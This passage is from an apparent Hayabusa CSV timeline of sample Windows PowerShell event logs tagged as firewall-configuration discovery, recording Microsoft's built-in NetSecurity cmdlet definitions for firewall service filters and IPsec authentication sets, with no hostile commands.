__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.926 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallServiceFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.926 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallServiceFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.926 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.926 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetIKEP1AuthSet"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetIPsecPhase1AuthSet</DefaultNoun> <InstanceCmdlets> <GetCmdletParameters DefaultCmdletParameterSet=""GetAll""> <QueryableProperties> <Property PropertyName=""InstanceID""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Name"" CmdletParameterSets=""ByName"" IsMandatory=""true"" Position=""0"" Aliases=""ID""/> </RegularQuery> </Property> <Property PropertyName=""DisplayName""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByDisplayName"" IsMandatory=""true""/> </RegularQuery> </Property> <Property PropertyName=""Description""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""DisplayGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""RuleGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Group"" CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PrimaryStatus""> <Type PSType=""NetSecurity.PrimaryStatus""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Status""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PolicyStoreSource""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PolicyStoreSourceType""> <Type PSType=""NetSecurity.PolicyStoreType""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> </QueryableProperties> <QueryableAssociations> <Association Association=""MSFT_NetConSecRuleMMAuthSet"" ResultRole=""PartComponent"" SourceRole=""GroupComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule""/> <CmdletParameterMetadata PSName=""AssociatedNetIPsecRule"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetIPsecRule""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetMainModeRuleMMAuthSet"" ResultRole=""PartComponent"" SourceRole=""GroupComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule""/> <CmdletParameterMetadata PSName=""AssociatedNetIPsecMainModeRule"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetIPsecMainModeRule""/> </AssociatedInstance> </Association> </QueryableAssociations> <QueryOptions> <Option OptionName=""All""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata CmdletParameterSets=""GetAll""/> </Option> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""TracePolicyStore""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> <Cmdlet> <CmdletMetadata Verb=""Set"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:ModifyInstance""> <Parameters> <Parameter ParameterName=""ElementName""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewDisplayName""/> </Parameter> <Parameter ParameterName=""Description""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Description""/> </Parameter> <Parameter ParameterName=""Proposals""> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance[]""/> <CmdletParameterMetadata PSName=""Proposal""/> </Parameter> </Parameters> </Method> <GetCmdletParameters> <QueryableProperties> <Property PropertyName=""InstanceID""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata Aliases=""ID"" PSName=""Name"" Position=""0"" IsMandatory=""true"" CmdletParameterSets=""ByName""/> </RegularQuery> </Property> <Property PropertyName=""DisplayName""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""DisplayName"" IsMandatory=""true"" CmdletParameterSets=""ByDisplayName""/> </RegularQuery> </Property> <Property PropertyName=""DisplayGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""DisplayGroup"" IsMandatory=""true"" CmdletParameterSets=""ByDisplayGroup""/> </RegularQuery> </Property> <Property PropertyName=""RuleGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Group"" IsMandatory=""true"" CmdletParameterSets=""ByGroup""/> </RegularQuery> </Property> </QueryableProperties> <QueryOptions> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Remove"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:DeleteInstance""/> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Rename"" ConfirmImpact=""Medium""/> <Method MethodName=""Rename""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""NewName""> <Type PSType=""string""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""NewName""/> </Parameter> </Parameters> </Method> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Copy"" ConfirmImpact=""Medium""/> <Method MethodName=""CloneObject""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""NewPolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewPolicyStore""/> </Parameter> <Parameter ParameterName=""NewGPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewGPOSession""/> </Parameter> <Parameter ParameterName=""NewName""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewName""/> </Parameter> </Parameters> </Method> </Cmdlet> </InstanceCmdlets> <StaticCmdlets> <Cmdlet> <CmdletMetadata Verb=""New"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:CreateInstance""> <Parameters> <Parameter ParameterName=""cim:OperationOption:PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""PolicyStore""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""GPOSession""/> </Parameter> <Parameter ParameterName=""InstanceID""> <Type PSType=""string""/> <CmdletParameterMetadata Aliases=""ID"" PSName=""Name""/> </Parameter> <Parameter ParameterName=""ElementName""> <Type PSType=""string""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""DisplayName""/> </Parameter> <Parameter ParameterName=""Description""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Description""/> </Parameter> <Parameter ParameterName=""RuleGroup""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Group""/> </Parameter> <Parameter ParameterName=""Proposals""> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance[]""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""Proposal""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:Default""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata PSName=""Default""/> </Parameter> </Parameters> </Method> </Cmdlet> </StaticCmdlets> </Class> <Enums> <Enum EnumName=""NetSecurity.PrimaryStatus"" UnderlyingType=""uint16""> <Value Name=""Unknown"" Value=""0""/> <Value Name=""OK"" Value=""1""/> <Value Name=""Inactive"" Value=""2""/> <Value Name=""Error"" Value=""3""/> </Enum> <Enum EnumName=""NetSecurity.PolicyStoreType"" UnderlyingType=""uint16""> <Value Name=""None"" Value=""0""/> <Value Name=""Local"" Value=""1""/> <Value Name=""GroupPolicy"" Value=""2""/> <Value Name=""Dynamic"" Value=""3""/> <Value Name=""Generated"" Value=""4""/> <Value Name=""Hardcoded"" Value=""5""/> </Enum> </Enums> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
